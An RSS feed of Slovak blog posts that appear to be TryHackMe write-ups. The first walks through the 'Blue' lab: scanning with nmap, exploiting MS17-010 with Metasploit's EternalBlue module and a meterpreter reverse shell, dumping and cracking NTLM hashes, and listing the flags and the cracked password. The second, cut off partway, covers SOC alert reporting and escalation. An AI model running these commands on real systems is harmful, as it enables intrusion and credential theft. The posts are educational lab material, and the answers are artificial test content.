<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: mikensen</title>
    <description>The latest articles on DEV Community by mikensen (@mikensen).</description>
    <link>https://dev.to/mikensen</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3805434%2F423771ad-3869-43a0-bce4-eb7027e46d06.png</url>
      <title>DEV Community: mikensen</title>
      <link>https://dev.to/mikensen</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mikensen"/>
    <language>en</language>
    <item>
      <title>THM - Blue</title>
      <dc:creator>mikensen</dc:creator>
      <pubDate>Fri, 13 Mar 2026 08:12:41 +0000</pubDate>
      <link>https://dev.to/mikensen/thm-blue-353m</link>
      <guid>https://dev.to/mikensen/thm-blue-353m</guid>
      <description>&lt;p&gt;Blue je jedna z "legendárnych" miestností na TryHackMe zameraná na exploit známej zraniteľnosti MS17-010 (EternalBlue) vo Windows SMB službe. Krásny príklad ako vobec pochopiť úplný zaklad "penetrácie" do systému. Usaď sa, alebo ešte lepšie - vyskúšaj si.&lt;/p&gt;

&lt;p&gt;Čo ti to dá podľa tryhackme.com :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SMB enumerácie&lt;/li&gt;
&lt;li&gt;práca s Metasploit&lt;/li&gt;
&lt;li&gt;exploitovania známej Windows zraniteľnosti.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Poďme na to !
&lt;/h2&gt;

&lt;p&gt;Ako väčšina zadaní na obdobných CTF strojoch, aj tu je cieľ - získať FLAG. Táto machine nám krásne ukáže ako sa dá - resp. ako sa dala rozbiť Windows 7 cez nedeľný obed.&lt;/p&gt;

&lt;h3&gt;
  
  
  TryHackMe
&lt;/h3&gt;

&lt;p&gt;Názov: Blue&lt;br&gt;
Obtiažnosť: Easy&lt;br&gt;
OS cieľa: Windows 7&lt;br&gt;
Téma: EternalBlue (MS17-010)&lt;br&gt;
Čas: ~15–60 minút (resp hodiny ak zabudneš spustiť VPN ako ja, keď som s týmto všetkým začínal)&lt;/p&gt;
&lt;h3&gt;
  
  
  Čo si vyskúšaš
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Ako skenovať cieľ Nmapom &lt;/li&gt;
&lt;li&gt;Čo je EternalBlue a prečo Microsoft mal veľmi zlý rok 2017&lt;/li&gt;
&lt;li&gt;Ako použiť Metasploit — nástroj ktorý vyzerá hrozivo ale je to v podstate IKEA návod&lt;/li&gt;
&lt;li&gt;Čo je Meterpreter shell&lt;/li&gt;
&lt;li&gt;Ako cracknúť heslo a cítiť sa pritom ako z Mr. Robot&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Disclaimer&lt;br&gt;
Všetky útoky robíme výhradne na TryHackMe stroji. Ak to skúsiš na niečom inom bez povolenia, možeš mať väčší problém ako ten Windows 7 bez patchov.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;🗺️ Typický Plán - Workflow&lt;br&gt;
Recon → Scanning / Enumeration → Exploitation → Privilege Escalation → Post-Exploitation → Loot / Flags - Pivko&lt;/p&gt;
&lt;h2&gt;
  
  
  FÁZA 1 — Recon - Scanning (a.k.a. "Kukám čo tam máte")
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;nmap -sV -sC -O --script vuln &amp;lt;IP_ADRESA&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Čo sme práve napísali:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flag&lt;/th&gt;
&lt;th&gt;Čo robí&lt;/th&gt;
&lt;th&gt;Laicky povedané&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sV&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Zisti verzie služieb&lt;/td&gt;
&lt;td&gt;"Čo tam beží a aká stará verzia?"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sC&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Spusti default skripty&lt;/td&gt;
&lt;td&gt;"Skontroluj bežné veci za mňa"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-O&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Detekuj OS&lt;/td&gt;
&lt;td&gt;"Aký systém tam je?"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--script vuln&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Skontroluj zraniteľnosti&lt;/td&gt;
&lt;td&gt;"Nájdi mi niečo na exploitovanie, prosím"&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;⏳ Nmap teraz pracuje. Toto je ideálny čas na kafe. resp. na zodpovedanie otázky &lt;em&gt;"a čo vlastne robíš na tom počítači?"&lt;/em&gt; od rodinných príslušníkov.****&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Ale reálne čo sa nás TryHackMe pýta ako prvé :&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;How many ports are open with a port number under 1000?&lt;br&gt;
&lt;code&gt;3&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;okej už teraz sa chytám za hlavu, lebo som do toho nmap príkazu nezadal, že stačia porty pod 1000.. čiže ich takto oscannuje (zbytočne)všetkých 65535.&lt;br&gt;
Lepší príkaz by bol :&lt;br&gt;
&lt;code&gt;nmap -sV -sC -O --script vuln -p 1-999 &amp;lt;IP_ADRESA&amp;gt;&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fctrn8716bzcdb2l5is0g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fctrn8716bzcdb2l5is0g.png" alt=" " width="800" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Čo tam hned vidíme ?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Port 445&lt;/strong&gt; = SMB protokol = Windows zdieľanie súborov = náš vstup do dejín.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;smb-vuln-ms17-010&lt;/strong&gt; 
Nmap nám práve povedal "hej, tento stroj má otvorené dvere, kľúč leží na rohožke"&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)&lt;br&gt;
&lt;code&gt;ms17-010&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;🤦 Windows 7 bez patchov. V roku 2017 tento exploit zasiahol nemocnice, banky a firmy po celom svete. Patch existoval. Ľudia ho nenainštalovali. WannaCry ransomware im potom zašifroval všetko. IT oddelenia mali veľmi zaujímavý pondelok.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;
  
  
  FÁZA 2 — Exploitation (Metasploit time)
&lt;/h2&gt;

&lt;p&gt;Spusti Metasploit :&lt;br&gt;
&lt;code&gt;msfconsole&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feclcyclljcxswb56bvog.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feclcyclljcxswb56bvog.png" alt=" " width="637" height="620"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vždy keď sa zobrazí tento ASCII art, tak sa cítim ako hacker z filmu...&lt;/p&gt;

&lt;p&gt;Ale Metasploit je v podstate google pre exploity. Akurát namiesto výsledkov dostaneš prístup do systémov..&lt;/p&gt;

&lt;p&gt;Nájdi exploit:&lt;br&gt;
&lt;code&gt;search ms17-010&lt;/code&gt;&lt;br&gt;
Uvidíš zoznam. Hľadáš:&lt;br&gt;
&lt;code&gt;exploit/windows/smb/ms17_010_eternalblue&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcxap0mkepdia1pf4ergv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcxap0mkepdia1pf4ergv.png" alt=" " width="800" height="338"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)&lt;br&gt;
&lt;code&gt;exploit/windows/smb/ms17_010_eternalblue&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;💡 Prečo sa volá EternalBlue? Vytvorila ho NSA — americká tajná služba. Niekto im ho ukradol a zverejnil. Microsoft vydal patch. Ľudia ho neignorovali... oh shit.. vlastne som to prezradil pred chvíľou - ignorovali. A tak vznikol WannaCry. Celý príbeh je lepší ako Netflix seriál.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Načítaj exploit:&lt;br&gt;
&lt;code&gt;use exploit/windows/smb/ms17_010_eternalblue&lt;/code&gt;&lt;br&gt;
Prompt sa zmení. Teraz si v module. Ako keď vstúpiš do obchodu — ešte si nič nekúpil ale už vieš čo chceš.&lt;/p&gt;

&lt;p&gt;Pozri čo treba v tom exploite/module nastaviť :&lt;br&gt;
&lt;code&gt;show options&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
Metasploit ti ukáže tabuľku. Povinné veci sú označené &lt;strong&gt;yes&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Nastav cieľ :&lt;br&gt;
&lt;code&gt;set RHOSTS &amp;lt;IP_ADRESA&amp;gt;&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
RHOSTS = Remote Hosts = "koho idem navštíviť bez pozvánky"&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Show options and set the one required value. What is the name of this value? (All caps for submission)&lt;br&gt;
&lt;code&gt;RHOSTS&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Nastav payload :&lt;br&gt;
&lt;code&gt;set payload windows/x64/meterpreter/reverse_tcp&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg8pjio1ocli0vgl60t83.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg8pjio1ocli0vgl60t83.png" alt=" " width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Payload = čo sa spustí na cieli po exploite. reverse_tcp znamená, že cieľ sa pripojí späť k nám. Nie my k nemu. Preto to funguje aj za firewallom — firewall blokuje prichádzajúce spojenia, ale odchádzajúce nechá. "vyšiel som von cez okno ale dvere sú stále zamknuté."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Spusti exploit :&lt;br&gt;
&lt;code&gt;run&lt;/code&gt; resp. &lt;code&gt;exploit&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrmqghcfq2ye2croudg2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrmqghcfq2ye2croudg2.png" alt=" " width="800" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Ak to hneď nefungovalo — normálne. Skús znova. Exploity sú už raz také..&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;
  
  
  FÁZA 3 — Post-Exploitation (Turistika po cudzom systéme)
&lt;/h2&gt;

&lt;p&gt;Máš shell. Čo teraz? Pozri sa kto si.&lt;br&gt;
Over svoje privilégiá&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;meterpreter &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; getuid
Server username: NT AUTHORITY&lt;span class="se"&gt;\S&lt;/span&gt;YSTEM
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;NT AUTHORITY\SYSTEM je najvyšší level na Windows. Vyšší ako Administrator. Vyšší ako IT admin. Vyšší ako CEO. Prakticky — môžeš robiť čokoľvek. EternalBlue ti nedal kľúče od bytu, dal ti kľúče od celej budovy.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h1&gt;
  
  
  Stabilizuj shell — migruj do iného procesu
&lt;/h1&gt;

&lt;p&gt;Tvoj shell môže byť nestabilný. Ukradni si miesto v inom procese:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;ps&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mb3gik12ctajarnnyui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mb3gik12ctajarnnyui.png" alt=" " width="800" height="292"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Uvidíš zoznam všetkých bežiacich procesov. Hľadáš niečo pokojné a stabilné — spoolsv.exe alebo svchost.exe. Vezmi jeho PID.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;migrate &amp;lt;PID&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  FÁZA 4 — Hashe a Cracking (Mr. Robot moment)
&lt;/h2&gt;

&lt;p&gt;Vytiahneme hashe :&lt;br&gt;
&lt;code&gt;hashdump&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff7b4fi9hnmjfpax61lek.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff7b4fi9hnmjfpax61lek.png" alt=" " width="800" height="72"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? &lt;br&gt;
&lt;code&gt;Jon&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;💡 Windows neukladá heslá ako plaintext — ukladá ich ako NTLM hashe. Hash je jednosmerná funkcia — heslo123 → ffb43f0de35be4d9917ac0cc8ad57f8d. Nedá sa priamo vrátiť späť. Ale dá sa uhádnuť — skúšaš milióny hesiel, hashneš ich a porovnávaš. Volá sa to slovníkový útok a je to presne také nudné ako znie.&lt;/p&gt;

&lt;p&gt;Uložíme ten Jonov hash do súboru hashujeme.txt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"ffb43f0de35be4d9917ac0cc8ad57f8d"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; hashujeme.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;💡 Celý reťazec má formát meno:RID:LM_hash:NTLM_hash::: — LM hash (aad3b435...) je prázdny placeholder ktorý Windows používa keď LM hashing vypnutý. NTLM hash je ten druhý a ten nás zaujíma.&lt;/p&gt;

&lt;p&gt;a potom crackneme s hashcatom :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat &lt;span class="nt"&gt;-m&lt;/span&gt; 1000 hash.txt /usr/share/wordlists/rockyou.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Heslo je alqfna22. Jon si myslel že je to bezpečné. Jon sa mýlil.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Copy this password hash to a file and research how to crack it. What is the cracked password?&lt;br&gt;
&lt;code&gt;alqfna22&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  🚩 Flagy
&lt;/h2&gt;

&lt;p&gt;Pohľadáme všetky súbory kde je slovo flag :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;search &lt;span class="nt"&gt;-f&lt;/span&gt; flag&lt;span class="k"&gt;*&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feijnph3poj5tx1l5dlvs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feijnph3poj5tx1l5dlvs.png" alt=" " width="800" height="186"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A už to len postupne prečítame..&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;C:&lt;span class="se"&gt;\\&lt;/span&gt;flag1.txt
&lt;span class="sb"&gt;`&lt;/span&gt;flag&lt;span class="o"&gt;{&lt;/span&gt;access_the_machine&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;

&lt;span class="nb"&gt;cat &lt;/span&gt;C:&lt;span class="se"&gt;\\&lt;/span&gt;Windows&lt;span class="se"&gt;\\&lt;/span&gt;System32&lt;span class="se"&gt;\\&lt;/span&gt;config&lt;span class="se"&gt;\\&lt;/span&gt;flag2.txt
&lt;span class="sb"&gt;`&lt;/span&gt;flag&lt;span class="o"&gt;{&lt;/span&gt;sam_database_elevated_access&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;

&lt;span class="nb"&gt;cat &lt;/span&gt;C:&lt;span class="se"&gt;\\&lt;/span&gt;Users&lt;span class="se"&gt;\\&lt;/span&gt;Jon&lt;span class="se"&gt;\\&lt;/span&gt;Documents&lt;span class="se"&gt;\\&lt;/span&gt;flag3.txt
&lt;span class="sb"&gt;`&lt;/span&gt;flag&lt;span class="o"&gt;{&lt;/span&gt;admin_documents_can_be_valuable&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  📊 Čo sme dnes urobili?
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

Nmap scan     →  Objavili sme otvorené dvere (port 445 + MS17-010)
EternalBlue   →  Prešli sme cez ne (SYSTEM shell)
Migrácia      →  Zaistili sme si pohodlný pobyt
Hashdump      →  Ukradli sme kľúče od trezoru
Hashcat       →  Otvorili sme trezor
Flagy         →  Zobrali sme čo tam bolo a odišli

A teraz pifko.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>slovak</category>
      <category>hacking</category>
      <category>vulnerabilities</category>
      <category>tryhackme</category>
    </item>
    <item>
      <title>THM - SOC L1 Alert Reporting</title>
      <dc:creator>mikensen</dc:creator>
      <pubDate>Wed, 11 Mar 2026 07:19:43 +0000</pubDate>
      <link>https://dev.to/mikensen/thm-soc-l1-alert-reporting-4m1j</link>
      <guid>https://dev.to/mikensen/thm-soc-l1-alert-reporting-4m1j</guid>
      <description>&lt;p&gt;L1 analytici pri triage alertov niekedy nevedia presne klasifikovať alert, preto potrebujú pomoc seniora alebo vlastníka systému. Môžu tiež naraziť na reálne kyberútoky, ktoré vyžadujú rýchlu reakciu. Táto časť vysvetľuje reportovanie alertov, eskaláciu a komunikáciu.&lt;/p&gt;

&lt;p&gt;Ciele:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;pochopiť reportovanie a eskaláciu v SOC&lt;/li&gt;
&lt;li&gt;naučiť sa písať komentáre a reporty k alertom&lt;/li&gt;
&lt;li&gt;spoznať správne komunikačné postupy&lt;/li&gt;
&lt;li&gt;precvičiť triage v simulovanom prostredí&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Alert Funnel
&lt;/h3&gt;

&lt;p&gt;L1 analytici dostávajú alerty v SIEM, EDR alebo ticket systéme.&lt;br&gt;
Väčšina alertov je False Positive alebo sa vyrieši na L1.&lt;br&gt;
True Positive a zložitejšie prípady sa eskalujú na L2.&lt;br&gt;
Len malé množstvo skončí ako reálny incident (DFIR).&lt;/p&gt;

&lt;p&gt;Dôležité pojmy&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Reporting – zdokumentovanie analýzy alertu a dôkazov (hlavne pri True Positive).&lt;/li&gt;
&lt;li&gt;Escalation – poslanie alertu na L2 analytika, ak treba ďalšie vyšetrovanie alebo zásah.&lt;/li&gt;
&lt;li&gt;Communication – komunikácia s inými tímami (napr. IT alebo HR) pre doplnenie informácií.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;✅ Cieľ: aby L2 mal jasný report a kontext a nemusel začínať analýzu od nuly.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What is the process of passing suspicious alerts to an L2 analyst for review?&lt;br&gt;
&lt;code&gt;Alert Escalation&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;What is the process of formally describing alert details and findings?&lt;br&gt;
&lt;code&gt;Alert Reporting&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Prečo písať report&lt;/p&gt;

&lt;p&gt;Report od L1 analytika je dôležitý, pretože:&lt;/p&gt;

&lt;p&gt;dáva kontext pre eskaláciu – L2 rýchlo pochopí situáciu&lt;/p&gt;

&lt;p&gt;uchováva zistenia – alerty sa ukladajú dlhodobo, logy len 3–12 mesiacov&lt;/p&gt;

&lt;p&gt;zlepšuje analytické schopnosti – vysvetlenie = lepšie pochopenie&lt;/p&gt;

&lt;p&gt;Formát reportu (5W)&lt;/p&gt;

&lt;p&gt;Pri reporte použi Five 'W':&lt;br&gt;
Who – ktorý používateľ vykonal akciu&lt;br&gt;
What – aká aktivita sa stala&lt;br&gt;
When – kedy sa aktivita začala a skončila&lt;br&gt;
Where – zariadenie, IP alebo web&lt;br&gt;
Why – dôvod tvojho záveru (True / False Positive)&lt;/p&gt;

&lt;p&gt;✅ Cieľ: aby L2 alebo DFIR tím rýchlo pochopil alert bez novej analýzy.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;According to the SOC dashboard, which user email leaked the sensitive document?&lt;br&gt;
&lt;code&gt;m.boslan@tryhackme.thm&lt;/code&gt;&lt;br&gt;
Looking at the new alerts, who is the "sender" of the suspicious, likely phishing email?&lt;br&gt;
&lt;code&gt;support@microsoft.com&lt;/code&gt;&lt;br&gt;
Open the phishing alert, read its details, and try to understand the activity.&lt;br&gt;
Using the Five Ws template, what flag did you receive after writing a good report?&lt;br&gt;
Note: Do not change the status yet, fill in the Analyst Comment and click Save.&lt;br&gt;
&lt;code&gt;HM{nice_attempt_faking_microsoft_support}&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Escalation Guide (SOC)
&lt;/h2&gt;

&lt;p&gt;Po vyhodnotení alertu a napísaní reportu musí L1 analytik rozhodnúť, či je potrebná eskalácia na L2.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kedy eskalovať alert
&lt;/h3&gt;

&lt;p&gt;Alert sa eskaluje, ak:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;naznačuje vážny kybernetický útok, ktorý vyžaduje hlbšiu analýzu alebo DFIR&lt;/li&gt;
&lt;li&gt;sú potrebné remediačné kroky (odstránenie malvéru, izolácia hosta, reset hesla)&lt;/li&gt;
&lt;li&gt;je nutná komunikácia s klientom, manažmentom, partnermi alebo autoritami&lt;/li&gt;
&lt;li&gt;analytik nerozumie alertu a potrebuje pomoc seniornejšieho kolegu&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Postup eskalácie
&lt;/h2&gt;

&lt;p&gt;Väčšinou stačí:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Priradiť ticket L2 analytikovi na smene&lt;/li&gt;
&lt;li&gt;Upozorniť ho v internom chate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Niektoré tímy však vyžadujú formálny eskalačný formulár s viacerými povinnými údajmi.&lt;/p&gt;

&lt;h3&gt;
  
  
  Čo robí L2
&lt;/h3&gt;

&lt;p&gt;Po prijatí ticketu L2:&lt;br&gt;
prečíta report od L1&lt;br&gt;
overí, či ide o True Positive&lt;br&gt;
pokračuje v detailnejšej analýze&lt;br&gt;
komunikuje s ďalšími tímami&lt;br&gt;
pri vážnych prípadoch spustí Incident Response proces&lt;br&gt;
Požiadanie o pomoc&lt;/p&gt;

&lt;p&gt;Ak si L1 nie je istý, je úplne v poriadku požiadať L2 o podporu. Najmä na začiatku je lepšie alert konzultovať než ho nesprávne uzavrieť.&lt;/p&gt;

&lt;h3&gt;
  
  
  Typický workflow v SOC nástroji
&lt;/h3&gt;

&lt;p&gt;Presunúť alert do stavu In Progress&lt;br&gt;
Vykonať analýzu&lt;br&gt;
Napísať alert report a určiť verdikt&lt;br&gt;
Ak treba, priradiť ticket L2&lt;br&gt;
L2 dostane notifikáciu a pokračuje v investigácii.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Who is your current L2 in the SOC dashboard that you can assign (escalate) the alerts to?&lt;br&gt;
&lt;code&gt;E.Fleming&lt;/code&gt;&lt;br&gt;
What flag did you receive after correctly escalating the alert from the previous task to L2?&lt;br&gt;
Note: If you correctly escalated the alert earlier, just edit the alert and click "Save" again.&lt;br&gt;
&lt;code&gt;THM{good_job_escalating_your_first_alert}&lt;/code&gt;&lt;br&gt;
Now, investigate the second new alert in the queue and provide a detailed alert comment.&lt;br&gt;
Then, decide if you need to escalate this alert and move on according to the process.&lt;br&gt;
After you finish your triage, you should receive a flag, which is your answer!&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Krízová komunikácia v SOC
&lt;/h2&gt;

&lt;p&gt;Eskalácia a reportovanie vyzerajú jednoducho, no v praxi sa často objavia nečakané situácie. Preto by mal mať SOC tím pripravené Crisis Communication postupy, ktoré určujú, ako reagovať v kritických prípadoch.&lt;/p&gt;

&lt;h3&gt;
  
  
  Typické komunikačné situácie
